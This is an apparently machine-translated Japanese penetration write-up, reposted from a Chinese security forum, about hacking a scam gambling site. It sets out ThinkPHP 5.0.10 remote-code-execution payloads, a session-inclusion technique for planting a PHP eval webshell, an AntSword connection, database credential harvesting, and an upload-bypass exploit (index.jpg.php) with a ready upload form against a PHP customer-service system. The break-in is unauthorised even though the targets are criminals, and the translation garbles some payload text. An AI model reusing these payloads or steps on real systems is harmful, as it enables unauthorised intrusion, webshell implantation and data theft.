.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
最近、詐欺ギャング
を調査するタスクを受け取りました
上記の登録インターフェイスがあります。最初にユーザーを直接登録して、彼らがどのように不正行為をしたかを確認できます。
良い男、ユーザーは8億元を獲得し、充電したユーザーは自分自身を専門家と呼びます。
一見、この種のサイトは、詐欺ギャングの豚を殺すディスクです。 TP5フレームワークを使用して、ワンクリックで構築します。これは便利でトラブルがありません。その後、エラーメッセージによると、TP5.0.10のフレームワークは実際にデバッグモードであり、それは豚を殺すゲームでした。
tp5rceを使用して、最初にphpinfoと入力してください
S=Captcha
_method=__ constructmethod=getFilter []=call_user_funcget []=phpinfo 
多くの禁止機能があるようです。現時点では、TP5 RCEとセッションでシェルを書くことがより困難です。 TP5ログの包含とセッションインクルージョンをGootshellに使用するのは非常に便利です。
ログ内にファイルを見つける必要があります。セッションを直接GOTSHELLに含めます。
まず、セッションセッションを設定し、テンテンテントロイの木馬に渡す
?s=captcha
_method=__ constructfilter []=think \ session3:setmethod=getGet []=?php eval($ _ post ['x'])?server []=1 
次に、ファイルを直接使用してセッションファイルを含めます。 TP5のセッションファイルは通常/TMP未満で、ファイル名はsession_sessionidです
?s=captcha
_method=__ constructmethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3x=phpinfo();
この時点で、私たちはアリの剣を介してシェルに接続することができます
Ant Sword 
で接続されたHTTPボディに投稿に渡されたパラメーターを追加する必要があります
接続後、config 
の下でデータベース.phpを見つけてデータベースパスワードアカウントを見つけます
財務および技術的な連絡先情報もあります
バックグラウンド
に直接ログインします
いい男、30人のメンバーと400を超えるロボットがいます。金額はバックグラウンドで自由に変更できます。いじめが多すぎます。
私はいつも、ここに電話した後、情報が少し小さすぎると感じています。詐欺ギャングが支払いを集めるために使用される携帯電話番号と銀行カードはわずかです。そこで、操作サイトで情報を収集しました。カスタマーサービスサイトは他のサーバー上にあることが判明しました。
のディレクトリスキャンを介してカスタマーサービスの背景を見つけます
私は弱いパスワードを試してみましたが、ユーザー管理者さえいないことがわかりました。管理者はそれをよく知っています。
私は大切な辞書を取り出して破裂させましたが、既存のユーザーは見つかりませんでした。彼のユーザー名は電話番号または非常に長いユーザー名のいずれかだと思います。
背景を入力しても大丈夫ではないようです
その後、IPカウンターチェックを通じて、サイドステーションがなく、このサイトにはこのカスタマーサービスシステムのみがあることがわかりました。
ドメイン名をスキャンして、何も見つかりませんでした
ただし、ページの下には、AIカスタマーサービスPHPオンラインカスタマーサービスシステムが搭載されています。インターネットにソースコードがあるべきだと思うので、私はバイドゥに行き、本当にソースコードを持っています。
ウェブサイトはTPセカンダリーに基づいて開発されていますが、TPのRCEはなくなりました。
ステップごとの監査は1つだけです
長い間検索した後、アプリケーション/管理者/コントローラー/event.phpファイルでブラックリストベースのアップロード機能uploadimg 
を見つけました。
アップロード関数アップロードImgを定義し、ファイル名を取得する変数名を定義し、配列内のドットで分離し、検出として変数extを介して2番目の配列を取得します。ファイルがindex.htmlに渡されると、$ ext=html、htmlがブラックリストに含まれるため、アップロードは失敗します。ファイルがindex.jpg.php、$ ext=jpgに渡された場合、jpgはブラックリストに含まれていないため、正常にアップロードできます。
TPのルーティングルールによると、このアップロードポイントは/admin/event/uploadimgに配置する必要があります。
このページにアップロードポイントはありません。アップロードページを単独で構築するだけです
form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'
ラベル='file'chenguangカスタマーサービスのアップロード/ラベル
入力型='ファイル' name='editormd-image-file' id='editormd-image-file'
入力タイプ='送信' name='送信'値='送信'
/形状
index.php 
をアップロードする場合
アップロードが失敗したことは事実です
index.jpg.php 
をアップロードしている場合
正常にアップロードできます
カスタマーサービスサイト
をご覧ください
jcに背景データをパッケージします
ここでは、秩序あるブラシを信じないようにみんなに促したいと思います。充電するように頼む人はお金を得ることができます。それらはすべて偽物です。一晩で金持ちになり、何かを利用することを考えないでください。世界には無料のランチはありません。
をご覧ください。
これらの詐欺ギャングは正当化され、よく根付いており、ますます多くを埋めるように頼むだけです。彼らは典型的な豚を殺すゴミです
侵入概要:
1.テストアカウントを登録します
2エラーが報告された後、TP5.0.10であることがわかった
3. tp5rceを使用してphpinfoを表示します
S=Captcha
Post:
_method=__ constructmethod=getFilter []=call_user_funcget []=phpinfo
ハザード関数は無効になっていることがわかりました
4.TP5ログ包含とセッションインクルージョンをゲッシェルに使用します
5.セッションセッションを設定して、テンテンショントロイの木馬に渡す
?s=captcha
役職:
_method=__ constructfilter []=think \ session3:setmethod=getGet []=?PHP eval($ _ post ['x'])?server []=1
6.ファイルを使用してセッションファイルを含めます。 TP5のセッションファイルは通常/TMP未満で、ファイル名はsession_sessionidです
?s=captcha
役職:
_method=__ constructmethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3x=phpinfo();
7.アリの剣を通してシェルを接続し、ポストに渡されたパラメーターをアリの剣で接続されたHTTPボディに追加します。
8。バックグラウンドソースコードを使用して、カスタマーサービスの背景を発見します。
9.サービスの背景はAIカスタマーサービスPHPオンラインカスタマーサービスシステムであり、システムにファイルアップロードの脆弱性があることがわかりました。
/admin/event/uploadimg
form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'
ラベル='file'chenguangカスタマーサービスのアップロード/ラベル
入力型='ファイル' name='editormd-image-file' id='editormd-image-file'
入力タイプ='送信' name='送信'値='送信'
/形状
オリジナルリンク:https://xz.aliyun.com/t/9286